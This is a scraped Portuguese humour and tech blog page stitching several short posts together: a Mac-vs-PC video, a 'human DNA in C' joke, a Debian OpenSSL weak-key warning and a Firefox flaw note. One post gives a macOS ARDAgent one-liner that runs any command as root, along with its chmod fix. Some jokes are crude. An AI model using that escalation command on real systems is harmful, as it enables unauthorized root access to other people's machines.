Mortal Kombat : Mac vs PC
Muito bom, mortal kombat com o PC e o MAC das propagandas da Apple.
Tá em inglês sem legenda.
From: cxdocs.enet!dchavez@decwrl.UUCP (Dale - Colo Spgs ESDP 523-2202 29-May-1991 0747)
Newsgroups: rec.humor.funny
Subject: A little C programming...
Keywords: computer, smirk
Date: 4 Aug 91 23:30:05 GMT
For many years molecular biologists have been mystified by the fact that very
little of an organism's DNA seems to serve any useful function.
I have solved the mystery.
The reason why only 30% of human DNA performs any useful function is that the
rest of it is comments.
Once we decode a typical human genome, we see that the contents begin as
follows:
===
/* HUMAN_DNA.H
*
* Human Genome
* Version 2.1
*
* (C) God
*/
/* Revision history:
*
* 0000-00-01 00:00 1.0 Adam.
* 0000-00-02 10:00 1.1 Eve.
* 0000-00-03 02:11 1.2 Added penis code to male version. A bit messy --
* will require a rewrite later on to make it neater.
* 0017-03-12 03:14 1.3 Added extra sex drive to male.h; took code from
* elephant-dna.c
* 0145-10-03 16:33 1.4 Removed tail.
* 1115-00-31 17:20 1.5 Shortened forearms, expanded brain case.
* 2091-08-20 13:56 1.6 Opposable thumbs added to hand() routine.
* 2501-04-09 14:04 1.7 Minor cosmetic improvements -- skin colour made
* darker to match my own image.
* 2909-07-12 02:21 1.8 Dentition inadequate; added extra 'wisdom' teeth.
* Must remember to make mouth bigger to compensate.
* 4501-12-31 14:18 1.9 Increase average height.
* 5533-02-12 17:09 2.0 Added gay option, triggered by high population
* density, to try and slow the overpopulation problem.
* 6004-11-04 16:11 2.1 Made forefinger narrower to fit hole in centre of
* CD.
*/
/* Standard definitions
*/
#define SEX male
#define HEIGHT 1.84
#define MASS 68
#define RACE caucasian
/* Include inherited traits from parent DNA files.
*
* Files must be pre-processed with MENDEL program to provide proper
* inheritance features.
*/
#include "mother.h"
#include "father.h"
#infndef FATHER
#warn("Father unknown -- guessing\n")
#include "bastard.h"
#endif
/* Set up sex-specific functions and variables
*/
#include
/* Kludged code -- I'll re-design this lot and re-write it as a proper
* library sometime soon.
*/
struct genitals
{
#ifdef MALE
Penis *jt;
#endif
/* G_spot *g; Removed for debugging purposes */
#ifdef FEMALE
Vagina *p;
#endif
}
/* Initialization bootstrap routine -- called before DNA duplication.
* Allocates buffers and sets up protein file pointers
*/
DNA *zygote_initialize(Sperm *, Ovum *);
/* MAIN INITIALIZATION CODE
*
* Returns structures containing pre-processed phenotypes for the organism
* to display at birth.
*
* Will be improved later to make output less ugly.
*/
Characteristic *lookup_phenotype(Identifier *i);
===
...and so on.
[ Note that God uses three-space tabs ]
--
Edited by Brad Templeton. MAIL your jokes (jokes ONLY) to funny@looking.ON.CA
Attribute the joke's source if at all possible. A Daemon will auto-reply.
Please don't send me requests of the form, "could you please send me the
joke about XXX?" Yes, I have it, but if I were willing to let myself be
a joke server I would spend all day doing it. I reject all such requests.
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
Isso mesmo, troque o whoami por qualquer outro comando e execute como root .
Agora vamos resolver o problema e eliminar a ameaça :
sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
Mas não vale Reparar as permissões , ou ele volta com a falha de segurança !!!
config.status: creating config.h config.status: executing depfiles commands make: opção inválida -- D make: opção inválida -- U make: opção inválida -- E make: opção inválida -- _ make: opção inválida -- O make: opção inválida -- D make: opção inválida -- _ make: opção inválida -- F make: opção inválida -- U make: opção inválida -- N Usage: make [options] [target] ...
Nada parecido com isso
Eu realmente espero que o cara tenha melhorado, mas após ver o vídeo algumas vezes... duvido muito.
Mas na verdade ele detonou a entropia necessário para gerar chaves criptográficas, limitando seu universo a apenas 65535 chaves possíveis. Ou seja, qualquer engraçadinho com 20 minutos pode testar TODAS as chaves dentro desse universo.
Um dos desenvolvedores do openssl disse que se tivesse recebido o patch da modificação, rolaria de rir mas teria impedido essa tragédia.
Como funcionaria um ataque usando essa vulnerabilidade :
Por isso não adianta apenas atualizar o sistema, TODAS as chaves criptográficas devem ser regeredas e reinstaladas
O time do debian em conjunto com os desenvolvedores oficiais lançaram uma ferramenta que verifica na conta de todos os usuários se algum deles tem chaves comprometidas, e não permite que o sshd estabeleça qualquer conexão com essas chaves comprometidas. A ferramenta se chama ssh-vulkey, e como root deve ser executada da seguinte forma :
ssh-vulkey -a
Com isso basta obrigar seus usuários a apagarem suas chaves, ou faze-lo você mesmo, eu faria :(
A parte triste dessa história é que por enquanto apenas o debian(e seus derivados) possuem essa ferramenta, eu que tenho fedora , gentoo e mac os x tive que apagar todas as chaves de todos meus usuários para garantir.
Em 8 anos de linux nunca vi uma falha tão grande, e que bota em risco todas as distribuições linux, BSD e sistemas Unix e não Unix que se autenticam por chaves geradas com openssl... Triste, muito triste.
Agora é definitivo, nunca mais confio em distribuições baseadas em debian em minhas máquinas, meu último debian em um Imac G3 será devidamente formatado na primeira oportunidade que tiver.
Pensando bem, acho que ela já morreu :P
Depois dos desentendimentos nos patches , aparentemente em 2006 alguém no time do debian retirou do código do SSL uma linha que era responsável por gerar números aleatórios para as chaves criptograficas .O motivo ? Gerava warnings no Walgrid, hahaha. Conclusão, oh ! shit ! é possível forjar uma chave privada a partir da pública, holy crap ! Sistemas com autenticação por chaves completamente vulneráveis...
That is, usa debian, ubuntu ou algum dos seus derivados ? ATUALIZE seu sistema imediatamente !!!
"Ei James, não quer ir pra cama comigo ?"
"Claro, mas onde ?"
"Pode ser na minha casa"
"Isso não é possível, eu deixaria de ser James Vagabond e seria um... dempregado !"
Brilhante !
Jesus....
===================================================================
--- player.py (Revision 4026)
+++ player.py (Revision 4027)
@@ -287,7 +287,9 @@
def init(pipeline, librarian):
gst.debug_set_default_threshold(gst.LEVEL_ERROR)
- if gst.element_make_from_uri(gst.URI_SRC, "file://", ""):
+ if gst.element_make_from_uri(
+ gst.URI_SRC,
+ "file:///Sebastian/Droge/please/choke/on/a/bucket/of/cocks", ""):
global playlist
playlist = PlaylistPlayer(pipeline or "gconfaudiosink",
librarian)
return playlist
Galera, vai brigar no boteco pô !!!

Eu demorei tudo isso, simplesmente porque no linux além de usar os comandinhos básicos normalmente os ips do cliente são criados estaticamente, ou seja, eu estava configurando os clientes para uma rede que não existia.... Só depois vi que o Leopard cria automaticamente os aliases nos devices e de quebra levanda um mini-dhcp server para os clientes...



Ok, a máquina ficou por volta de 30 minutos sem responder, o HD do macbook pro é muuuuito lerdo PQP ! Mas não travou :) E ainda consegui trabalhar nela por algumas horas... depois de fechar todos os apps, a memória voltou ao normal, sem memory leaks, um feito !
A falha permite que um atacante acesse arquivos do diretório de configração do firefox, aquela que fica na sua home e armazena seus bookmarks, exenções e senhas :) Você confia na criptografia do firefox ? Não ? Então instale a extenção noscript e desligue o javascript do seu browser.
fonte: http://www.0x000000.com
Um desenvolvedor do firefox discorda da falha ....
Delicious/liquuid/hahaha
Youtube nos anos 80 :: blog do liquuid
Como descobrir que capoeira não é luta em 55 segundos :: blog do liquuid
Dercy quase completa .... :: blog do liquuid
RAP do LHC ! :: blog do liquuid
DNA humano em C :: blog do liquuid
Ownando um MAC OS X Leopard com um comando :: blog do liquuid
Easter egg no mysqlnavigator ? :: blog do liquuid
Marcha imperial com floppy drive :: blog do liquuid
Dor, muita DOR :: blog do liquuid
Diário Imaginário do Padre Voador
Fun Forever - Luxury fun is affordable for everyone! " Rice Field Art
Divulgação :: blog do liquuid
Fiasco do debian : risco para outros sistemas ? :: blog do liquuid
Vai por mim, venda seu carro e ande de bicicleta :: blog do liquuid
Fazendo script kiddie de otário :: blog do liquuid